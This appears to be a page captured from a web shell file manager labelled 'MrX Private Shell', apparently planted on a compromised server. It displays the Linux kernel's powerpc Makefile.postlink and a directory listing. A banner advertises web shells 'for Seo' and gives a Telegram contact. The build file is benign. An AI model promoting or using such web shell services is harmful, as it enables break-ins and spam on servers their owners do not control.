__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# SPDX-License-Identifier: GPL-2.0
# ===========================================================================
# Post-link powerpc pass
# ===========================================================================
#
# 1. Check that vmlinux relocations look sane
PHONY := __archpost
__archpost:
-include include/config/auto.conf
include $(srctree)/scripts/Kbuild.include
quiet_cmd_head_check = CHKHEAD $@
cmd_head_check = $(CONFIG_SHELL) $(srctree)/arch/powerpc/tools/head_check.sh "$(NM)" "$@"
quiet_cmd_relocs_check = CHKREL $@
ifdef CONFIG_PPC_BOOK3S_64
cmd_relocs_check = \
$(CONFIG_SHELL) $(srctree)/arch/powerpc/tools/relocs_check.sh "$(OBJDUMP)" "$(NM)" "$@" ; \
$(BASH) $(srctree)/arch/powerpc/tools/unrel_branch_check.sh "$(OBJDUMP)" "$(NM)" "$@"
else
cmd_relocs_check = \
$(CONFIG_SHELL) $(srctree)/arch/powerpc/tools/relocs_check.sh "$(OBJDUMP)" "$(NM)" "$@"
endif
quiet_cmd_ftrace_check = CHKFTRC $@
cmd_ftrace_check = $(CONFIG_SHELL) $(srctree)/arch/powerpc/tools/ftrace_check.sh "$(NM)" "$@"
# `@true` prevents complaint when there is nothing to be done
vmlinux: FORCE
@true
ifdef CONFIG_PPC64
$(call cmd,head_check)
endif
ifdef CONFIG_RELOCATABLE
$(call if_changed,relocs_check)
endif
ifdef CONFIG_FUNCTION_TRACER
ifndef CONFIG_PPC64_ELF_ABI_V1
$(call cmd,ftrace_check)
endif
endif
clean:
rm -f .tmp_symbols.txt
PHONY += FORCE clean
FORCE:
.PHONY: $(PHONY)
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| boot | Folder | 0755 |
|
|
| crypto | Folder | 0755 |
|
|
| include | Folder | 0755 |
|
|
| kernel | Folder | 0755 |
|
|
| kexec | Folder | 0755 |
|
|
| kvm | Folder | 0755 |
|
|
| lib | Folder | 0755 |
|
|
| math-emu | Folder | 0755 |
|
|
| mm | Folder | 0755 |
|
|
| net | Folder | 0755 |
|
|
| perf | Folder | 0755 |
|
|
| platforms | Folder | 0755 |
|
|
| purgatory | Folder | 0755 |
|
|
| sysdev | Folder | 0755 |
|
|
| tools | Folder | 0755 |
|
|
| xmon | Folder | 0755 |
|
|
| Kbuild | File | 501 B | 0644 |
|
| Kconfig | File | 42.32 KB | 0644 |
|
| Kconfig.debug | File | 11.53 KB | 0644 |
|
| Makefile | File | 13.9 KB | 0644 |
|
| Makefile.postlink | File | 1.39 KB | 0644 |
|